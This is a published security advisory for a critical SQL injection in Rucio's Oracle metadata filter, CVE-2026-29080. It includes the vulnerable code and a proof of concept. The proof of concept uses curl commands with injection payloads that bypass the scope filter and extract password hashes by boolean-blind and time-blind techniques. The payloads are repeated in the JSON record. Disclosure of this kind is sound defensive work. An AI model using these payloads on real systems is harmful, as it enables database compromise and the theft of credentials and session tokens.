GHSA-VJR5-C9QV-HGM3

Vulnerability from github – Published: 2026-05-06 16:42 – Updated: 2026-06-30 16:42
VLAI
Summary
Rucio has SQL Injection in FilterEngine Oracle JSON Path via DID Search API
Details

Summary

A SQL injection vulnerability in the Oracle path of FilterEngine.create_sqla_query allows any authenticated Rucio user to execute arbitrary SQL against the backend database through the DID search endpoint (GET /dids/<scope>/dids/search). Attacker-controlled filter keys and values are interpolated directly into sqlalchemy.text via Python str.format, completely bypassing parameterization. This enables full database compromise including extraction of authentication tokens, password hashes, and all managed data identifiers. The vulnerability is affecting deployments using the default metadata plugin configuration json_meta with Oracle database backends.


Details

The vulnerability exists in lib/rucio/core/did_meta_plugins/filter_engine.py within the create_sqla_query() method. When the database dialect is Oracle, filter expressions for JSON metadata columns are constructed using text() with Python string formatting:

filter_engine.py:552 (string equality — default branch):

expression = text("json_exists({},'$?(@.{} {} \"{}\")')".format(
    json_column.key, key, ORACLE_OP_MAP[oper], value))

filter_engine.py:548 (boolean branch):

expression = text("json_exists({},'$?(@.{}.boolean() {} \"{}\")')".format(
    json_column.key, key, ORACLE_OP_MAP[oper], value))

filter_engine.py:550 (numeric branch — value unquoted):

expression = text("json_exists({},'$?(@.{} {} {})')".format(
    json_column.key, key, ORACLE_OP_MAP[oper], value))

filter_engine.py:542 (wildcard/LIKE branch):

expression = text("json_exists({},'$?(@.{} like \"{}\")')".format(
    json_column.key, key, value.replace('*', '%')))

Both key and value are attacker-controlled strings derived from HTTP query parameters. The text() function creates a raw SQL fragment — it does not escape or parameterize its contents.

Why no existing defense blocks this

The complete data flow from HTTP request to SQL execution passes through 7 layers with no effective sanitization:

  1. HTTP input (dids.py:265-274): Filter keys and values are accepted from query parameters via ast.literal_eval() (which accepts arbitrary Python string literals) or directly from individual query argument names/values.

  2. Plugin routing (did_meta_plugins/__init__.py:227-248): Each filter key is checked via manages_key(). For keys that are NOT columns of the DataIdentifier model (e.g., custom metadata keys like custom_key), did_column_meta.manages_key() returns False, and the request falls through to json_meta.manages_key(), which returns True for any key on Oracle ≥12 (json_meta.py:234json_implemented()True).

  3. FilterEngine initialization (filter_engine.py:260): The json_meta plugin instantiates FilterEngine with strict_coerce=False (json_meta.py:178). In _coerce_filter_word_to_model_attribute() (line 116), when the key is not an attribute of models.DidMeta and strict=False, the raw string is returned without validation.

  4. Value typecasting (filter_engine.py:275-297): _try_typecast_string() attempts to parse the value as a boolean, datetime, or number. SQL injection strings fail all these parsers and are returned unchanged as strings.

  5. Sanity checks (filter_engine.py:149-190): _sanity_check_translated_filters() only validates did_type, name, length, wildcard operators, created_at format, and duplicates. It does not validate arbitrary key names or values for SQL-unsafe characters.

  6. SQL construction (filter_engine.py:536-554): On Oracle, the unsanitized key and value strings are interpolated directly into text() via .format().

  7. SQL execution (json_meta.py:199,212): The resulting Select statement containing the injected text() clause is executed via session.execute(stmt).

Note on the non-Oracle path

The non-Oracle branch of create_sqla_query() (lines 555-579) uses SQLAlchemy's json_column[key].as_string() accessor, which compiles the key as a bind parameter (%(meta_1)s). This path is not vulnerable. The vulnerability is specific to the Oracle dialect branch that uses text() with .format().


PoC

Prerequisites: - A Rucio instance using Oracle as the database backend - The default metadata plugin configuration (json_meta as custom plugin — this is the default) - Any valid Rucio authentication token (obtainable via userpass, x509, OIDC, SAML, SSH, or GSS)

Note on injection technique: The text() fragment is inserted into a SQLAlchemy query that includes additional bind-parameter conditions (e.g., AND system.did_meta.scope = :scope_1). SQL comment (--) cannot be used to discard the trailing syntax because cx_Oracle validates that all registered bind parameters exist in the SQL text, raising ORA-01036 if they are commented out. Instead, the injection consumes the template's trailing characters (")')) by opening a dummy json_exists() call that the trailing characters close naturally, preserving all bind parameters.

The format template suffix after the injected value is exactly ")') — four characters: closing double-quote, closing predicate paren, closing path string single-quote, closing json_exists() paren. The payload opens a new json_exists(meta,'$?(@.a == "b which the suffix closes as json_exists(meta,'$?(@.a == "b")').

1. Obtain an authentication token

TOKEN=$(curl -s -k \
  -H 'X-Rucio-Account: testuser' \
  -H 'X-Rucio-Username: testuser' \
  -H 'X-Rucio-Password: testpass' \
  'https://rucio.example.org/auth/userpass' \
  -D - 2>/dev/null | grep -i 'x-rucio-auth-token' | awk '{print $2}' | tr -d '\r')

2. Boolean-based scope bypass

curl -s -k \
  -H "X-Rucio-Auth-Token: $TOKEN" \
  -H "Accept: application/x-json-stream" \
  'https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%201%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b'

URL-decoded filter value: x")') OR 1=1 OR json_exists(meta,'$?(@.a == "b

Generated SQL inside text():

json_exists(meta,'$?(@.custom_key == "x")') OR 1=1 OR json_exists(meta,'$?(@.a == "b")')

Full WHERE clause as compiled by SQLAlchemy:

WHERE json_exists(meta,'$?(@.custom_key == "x")') OR 1=1 OR json_exists(meta,'$?(@.a == "b")') AND system.did_meta.scope = :scope_1

Why this bypasses the scope filter: SQL operator precedence — AND binds tighter than OR. Oracle parses this as:

WHERE
  json_exists(...)                                        -- disjunct 1
  OR 1=1                                                  -- disjunct 2 (always TRUE)
  OR (json_exists(...) AND system.did_meta.scope = :scope_1)  -- disjunct 3

Because 1=1 is unconditionally true, the entire WHERE clause evaluates to TRUE for every row regardless of scope. All bind parameters (:scope_1) remain intact in the SQL — no ORA-01036.

Expected result: All rows from did_meta are returned regardless of scope.

3. Boolean-based blind injection (data extraction)

curl -s -k \
  -H "X-Rucio-Auth-Token: $TOKEN" \
  -H "Accept: application/x-json-stream" \
  'https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%20(SELECT%20CASE%20WHEN%20SUBSTR((SELECT%20password%20FROM%20identities%20WHERE%20ROWNUM%3D1)%2C1%2C1)%3D%27a%27%20THEN%201%20ELSE%200%20END%20FROM%20dual)%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b'

URL-decoded filter value:

x")') OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)='a' THEN 1 ELSE 0 END FROM dual)=1 OR json_exists(meta,'$?(@.a == "b

Generated SQL inside text():

json_exists(meta,'$?(@.custom_key == "x")') OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)='a' THEN 1 ELSE 0 END FROM dual)=1 OR json_exists(meta,'$?(@.a == "b")')

Expected result: - If the first character of the first password hash is 'a': rows are returned (subquery returns 1, 1=1 is true, OR makes WHERE true) - Otherwise: no rows from the subquery disjunct (but the dummy json_exists AND scope disjunct may still match scoped rows — the attacker distinguishes by response row count) - Repeat for each character position and value to extract the full hash

4. Time-based blind injection (alternative extraction)

curl -s -k -o /dev/null -w "%{time_total}" \
  -H "X-Rucio-Auth-Token: $TOKEN" \
  -H "Accept: application/x-json-stream" \
  'https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%20(SELECT%20CASE%20WHEN%20SUBSTR((SELECT%20password%20FROM%20identities%20WHERE%20ROWNUM%3D1)%2C1%2C1)%3D%27a%27%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE(%27x%27%2C5)%20ELSE%200%20END%20FROM%20dual)%3D5%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b'

URL-decoded filter value:

x")') OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)='a' THEN DBMS_PIPE.RECEIVE_MESSAGE('x',5) ELSE 0 END FROM dual)=5 OR json_exists(meta,'$?(@.a == "b

Expected result: - If condition is true: response delayed by ~5 seconds - If condition is false: immediate response - More reliable extraction channel than boolean-based when row counts are ambiguous

5. Alternative entry via filters query parameter

curl -s -k \
  -H "X-Rucio-Auth-Token: $TOKEN" \
  -H "Accept: application/x-json-stream" \
  'https://rucio.example.org/dids/user.testuser/dids/search?filters=%5B%7B%22custom_key%22%3A%20%22x%5C%22%27)%20OR%201%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%5C%22b%22%7D%5D'

URL-decoded: filters=[{"custom_key": "x\"') OR 1=1 OR json_exists(meta,'$?(@.a == \"b"}]


Impact

Vulnerability type: SQL Injection (CWE-89)

Who is impacted:

  • All Oracle-based Rucio deployments using the default metadata plugin configuration (json_meta).
  • Not affected are PostgreSQL/MySQL deployments using the default json_meta plugin (SQLAlchemy parameterizes the JSON path operations via bind parameters on non-Oracle dialects).

What an attacker can do:

  • Full database read access: Extract any table including identities (password hashes and salts), tokens (active authentication sessions), accounts (user enumeration), rse_settings (storage endpoint credentials), and rules (data management policies).
  • Password hash extraction: Combined with Rucio's use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.
  • Authentication token theft: Active bearer tokens can be extracted and used for immediate session hijacking.
  • Data modification: Oracle PL/SQL enables INSERT/UPDATE/DELETE operations via DML within subqueries and PL/SQL blocks.
  • Potential remote code execution: Via Oracle's UTL_HTTP, DBMS_SCHEDULER, or Java stored procedures if the database user has elevated privileges.

Required attacker privileges: Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The GET /dids/<scope>/dids/search endpoint is available to all authenticated users.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.27.0"
            },
            {
              "fixed": "35.8.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0"
            },
            {
              "fixed": "38.5.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "39.0.0"
            },
            {
              "fixed": "39.4.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "40.0.0"
            },
            {
              "fixed": "40.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29080"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T16:42:49Z",
    "nvd_published_at": "2026-05-06T17:16:22Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nA SQL injection vulnerability in the Oracle path of `FilterEngine.create_sqla_query` allows any authenticated Rucio user to execute arbitrary SQL against the backend database through the DID search endpoint (`GET /dids/\u003cscope\u003e/dids/search`). Attacker-controlled filter keys and values are interpolated directly into `sqlalchemy.text` via Python `str.format`, completely bypassing parameterization. This enables full database compromise including extraction of authentication tokens, password hashes, and all managed data identifiers. The vulnerability is affecting deployments using the default metadata plugin configuration `json_meta` with Oracle database backends.\n\n---\n\n### Details\n\nThe vulnerability exists in `lib/rucio/core/did_meta_plugins/filter_engine.py` within the `create_sqla_query()` method. When the database dialect is Oracle, filter expressions for JSON metadata columns are constructed using `text()` with Python string formatting:\n\n**filter_engine.py:552** (string equality \u2014 default branch):\n```python\nexpression = text(\"json_exists({},\u0027$?(@.{} {} \\\"{}\\\")\u0027)\".format(\n    json_column.key, key, ORACLE_OP_MAP[oper], value))\n```\n\n**filter_engine.py:548** (boolean branch):\n```python\nexpression = text(\"json_exists({},\u0027$?(@.{}.boolean() {} \\\"{}\\\")\u0027)\".format(\n    json_column.key, key, ORACLE_OP_MAP[oper], value))\n```\n\n**filter_engine.py:550** (numeric branch \u2014 value unquoted):\n```python\nexpression = text(\"json_exists({},\u0027$?(@.{} {} {})\u0027)\".format(\n    json_column.key, key, ORACLE_OP_MAP[oper], value))\n```\n\n**filter_engine.py:542** (wildcard/LIKE branch):\n```python\nexpression = text(\"json_exists({},\u0027$?(@.{} like \\\"{}\\\")\u0027)\".format(\n    json_column.key, key, value.replace(\u0027*\u0027, \u0027%\u0027)))\n```\n\nBoth `key` and `value` are attacker-controlled strings derived from HTTP query parameters. The `text()` function creates a raw SQL fragment \u2014 it does **not** escape or parameterize its contents.\n\n#### Why no existing defense blocks this\n\nThe complete data flow from HTTP request to SQL execution passes through 7 layers with no effective sanitization:\n\n1. **HTTP input** (`dids.py:265-274`): Filter keys and values are accepted from query parameters via `ast.literal_eval()` (which accepts arbitrary Python string literals) or directly from individual query argument names/values.\n\n2. **Plugin routing** (`did_meta_plugins/__init__.py:227-248`): Each filter key is checked via `manages_key()`. For keys that are NOT columns of the `DataIdentifier` model (e.g., custom metadata keys like `custom_key`), `did_column_meta.manages_key()` returns `False`, and the request falls through to `json_meta.manages_key()`, which returns `True` for any key on Oracle \u226512 (`json_meta.py:234` \u2192 `json_implemented()` \u2192 `True`).\n\n3. **FilterEngine initialization** (`filter_engine.py:260`): The `json_meta` plugin instantiates `FilterEngine` with `strict_coerce=False` (`json_meta.py:178`). In `_coerce_filter_word_to_model_attribute()` (line 116), when the key is not an attribute of `models.DidMeta` and `strict=False`, the raw string is returned without validation.\n\n4. **Value typecasting** (`filter_engine.py:275-297`): `_try_typecast_string()` attempts to parse the value as a boolean, datetime, or number. SQL injection strings fail all these parsers and are returned unchanged as strings.\n\n5. **Sanity checks** (`filter_engine.py:149-190`): `_sanity_check_translated_filters()` only validates `did_type`, `name`, `length`, wildcard operators, `created_at` format, and duplicates. It does **not** validate arbitrary key names or values for SQL-unsafe characters.\n\n6. **SQL construction** (`filter_engine.py:536-554`): On Oracle, the unsanitized key and value strings are interpolated directly into `text()` via `.format()`.\n\n7. **SQL execution** (`json_meta.py:199,212`): The resulting `Select` statement containing the injected `text()` clause is executed via `session.execute(stmt)`.\n\n#### Note on the non-Oracle path\n\nThe non-Oracle branch of `create_sqla_query()` (lines 555-579) uses SQLAlchemy\u0027s `json_column[key].as_string()` accessor, which compiles the key as a bind parameter (`%(meta_1)s`). This path is **not vulnerable**. The vulnerability is specific to the Oracle dialect branch that uses `text()` with `.format()`.\n\n---\n\n### PoC\n\n**Prerequisites:**\n- A Rucio instance using Oracle as the database backend\n- The default metadata plugin configuration (`json_meta` as custom plugin \u2014 this is the default)\n- Any valid Rucio authentication token (obtainable via userpass, x509, OIDC, SAML, SSH, or GSS)\n\n**Note on injection technique:** The `text()` fragment is inserted into a SQLAlchemy query that includes additional bind-parameter conditions (e.g., `AND system.did_meta.scope = :scope_1`). SQL comment (`--`) cannot be used to discard the trailing syntax because cx_Oracle validates that all registered bind parameters exist in the SQL text, raising `ORA-01036` if they are commented out. Instead, the injection consumes the template\u0027s trailing characters (`\")\u0027)`) by opening a dummy `json_exists()` call that the trailing characters close naturally, preserving all bind parameters.\n\nThe format template suffix after the injected value is exactly `\")\u0027)` \u2014 four characters: closing double-quote, closing predicate paren, closing path string single-quote, closing `json_exists()` paren. The payload opens a new `json_exists(meta,\u0027$?(@.a == \"b` which the suffix closes as `json_exists(meta,\u0027$?(@.a == \"b\")\u0027)`.\n\n#### 1. Obtain an authentication token\n\n```bash\nTOKEN=$(curl -s -k \\\n  -H \u0027X-Rucio-Account: testuser\u0027 \\\n  -H \u0027X-Rucio-Username: testuser\u0027 \\\n  -H \u0027X-Rucio-Password: testpass\u0027 \\\n  \u0027https://rucio.example.org/auth/userpass\u0027 \\\n  -D - 2\u003e/dev/null | grep -i \u0027x-rucio-auth-token\u0027 | awk \u0027{print $2}\u0027 | tr -d \u0027\\r\u0027)\n```\n\n#### 2. Boolean-based scope bypass\n\n```bash\ncurl -s -k \\\n  -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n  -H \"Accept: application/x-json-stream\" \\\n  \u0027https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%201%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b\u0027\n```\n\n**URL-decoded filter value:** `x\")\u0027) OR 1=1 OR json_exists(meta,\u0027$?(@.a == \"b`\n\n**Generated SQL inside `text()`:**\n```sql\njson_exists(meta,\u0027$?(@.custom_key == \"x\")\u0027) OR 1=1 OR json_exists(meta,\u0027$?(@.a == \"b\")\u0027)\n```\n\n**Full WHERE clause as compiled by SQLAlchemy:**\n```sql\nWHERE json_exists(meta,\u0027$?(@.custom_key == \"x\")\u0027) OR 1=1 OR json_exists(meta,\u0027$?(@.a == \"b\")\u0027) AND system.did_meta.scope = :scope_1\n```\n\n**Why this bypasses the scope filter:** SQL operator precedence \u2014 `AND` binds tighter than `OR`. Oracle parses this as:\n```sql\nWHERE\n  json_exists(...)                                        -- disjunct 1\n  OR 1=1                                                  -- disjunct 2 (always TRUE)\n  OR (json_exists(...) AND system.did_meta.scope = :scope_1)  -- disjunct 3\n```\n\nBecause `1=1` is unconditionally true, the entire WHERE clause evaluates to TRUE for every row regardless of scope. All bind parameters (`:scope_1`) remain intact in the SQL \u2014 no `ORA-01036`.\n\n**Expected result:** All rows from `did_meta` are returned regardless of scope.\n\n#### 3. Boolean-based blind injection (data extraction)\n\n```bash\ncurl -s -k \\\n  -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n  -H \"Accept: application/x-json-stream\" \\\n  \u0027https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%20(SELECT%20CASE%20WHEN%20SUBSTR((SELECT%20password%20FROM%20identities%20WHERE%20ROWNUM%3D1)%2C1%2C1)%3D%27a%27%20THEN%201%20ELSE%200%20END%20FROM%20dual)%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b\u0027\n```\n\n**URL-decoded filter value:**\n```\nx\")\u0027) OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)=\u0027a\u0027 THEN 1 ELSE 0 END FROM dual)=1 OR json_exists(meta,\u0027$?(@.a == \"b\n```\n\n**Generated SQL inside `text()`:**\n```sql\njson_exists(meta,\u0027$?(@.custom_key == \"x\")\u0027) OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)=\u0027a\u0027 THEN 1 ELSE 0 END FROM dual)=1 OR json_exists(meta,\u0027$?(@.a == \"b\")\u0027)\n```\n\n**Expected result:**\n- If the first character of the first password hash is `\u0027a\u0027`: rows are returned (subquery returns 1, `1=1` is true, OR makes WHERE true)\n- Otherwise: no rows from the subquery disjunct (but the dummy `json_exists` AND scope disjunct may still match scoped rows \u2014 the attacker distinguishes by response row count)\n- Repeat for each character position and value to extract the full hash\n\n#### 4. Time-based blind injection (alternative extraction)\n\n```bash\ncurl -s -k -o /dev/null -w \"%{time_total}\" \\\n  -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n  -H \"Accept: application/x-json-stream\" \\\n  \u0027https://rucio.example.org/dids/user.testuser/dids/search?custom_key=x%22%27)%20OR%20(SELECT%20CASE%20WHEN%20SUBSTR((SELECT%20password%20FROM%20identities%20WHERE%20ROWNUM%3D1)%2C1%2C1)%3D%27a%27%20THEN%20DBMS_PIPE.RECEIVE_MESSAGE(%27x%27%2C5)%20ELSE%200%20END%20FROM%20dual)%3D5%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%22b\u0027\n```\n\n**URL-decoded filter value:**\n```\nx\")\u0027) OR (SELECT CASE WHEN SUBSTR((SELECT password FROM identities WHERE ROWNUM=1),1,1)=\u0027a\u0027 THEN DBMS_PIPE.RECEIVE_MESSAGE(\u0027x\u0027,5) ELSE 0 END FROM dual)=5 OR json_exists(meta,\u0027$?(@.a == \"b\n```\n\n**Expected result:**\n- If condition is true: response delayed by ~5 seconds\n- If condition is false: immediate response\n- More reliable extraction channel than boolean-based when row counts are ambiguous\n\n#### 5. Alternative entry via `filters` query parameter\n\n```bash\ncurl -s -k \\\n  -H \"X-Rucio-Auth-Token: $TOKEN\" \\\n  -H \"Accept: application/x-json-stream\" \\\n  \u0027https://rucio.example.org/dids/user.testuser/dids/search?filters=%5B%7B%22custom_key%22%3A%20%22x%5C%22%27)%20OR%201%3D1%20OR%20json_exists(meta%2C%27%24%3F(%40.a%20%3D%3D%20%5C%22b%22%7D%5D\u0027\n```\n\n**URL-decoded:** `filters=[{\"custom_key\": \"x\\\"\u0027) OR 1=1 OR json_exists(meta,\u0027$?(@.a == \\\"b\"}]`\n\n---\n\n### Impact\n\n**Vulnerability type:** SQL Injection (CWE-89)\n\n**Who is impacted:**\n\n- **All Oracle-based Rucio deployments** using the default metadata plugin configuration (`json_meta`).\n- ***Not affected*** are PostgreSQL/MySQL deployments using the default `json_meta` plugin (SQLAlchemy parameterizes the JSON path operations via bind parameters on non-Oracle dialects).\n\n**What an attacker can do:**\n\n- **Full database read access:** Extract any table including `identities` (password hashes and salts), `tokens` (active authentication sessions), `accounts` (user enumeration), `rse_settings` (storage endpoint credentials), and `rules` (data management policies).\n- **Password hash extraction:** Combined with Rucio\u0027s use of single-iteration SHA-256 for password hashing (no KDF), extracted hashes can be cracked at GPU speed.\n- **Authentication token theft:** Active bearer tokens can be extracted and used for immediate session hijacking.\n- **Data modification:** Oracle PL/SQL enables `INSERT`/`UPDATE`/`DELETE` operations via DML within subqueries and PL/SQL blocks.\n- **Potential remote code execution:** Via Oracle\u0027s `UTL_HTTP`, `DBMS_SCHEDULER`, or Java stored procedures if the database user has elevated privileges.\n\n**Required attacker privileges:** Any authenticated Rucio user. Authentication tokens can be obtained via any supported method (userpass, x509, OIDC, SAML, SSH, GSS). No special roles or administrative permissions are required. The `GET /dids/\u003cscope\u003e/dids/search` endpoint is available to all authenticated users.",
  "id": "GHSA-vjr5-c9qv-hgm3",
  "modified": "2026-06-30T16:42:55Z",
  "published": "2026-05-06T16:42:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-vjr5-c9qv-hgm3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29080"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-vjr5-c9qv-hgm3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/rucio/PYSEC-2026-528.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rucio/rucio"
    },
    {
      "type": "WEB",
      "url": "https://pypi.org/project/rucio"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Rucio has SQL Injection in FilterEngine Oracle JSON Path via DID Search API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…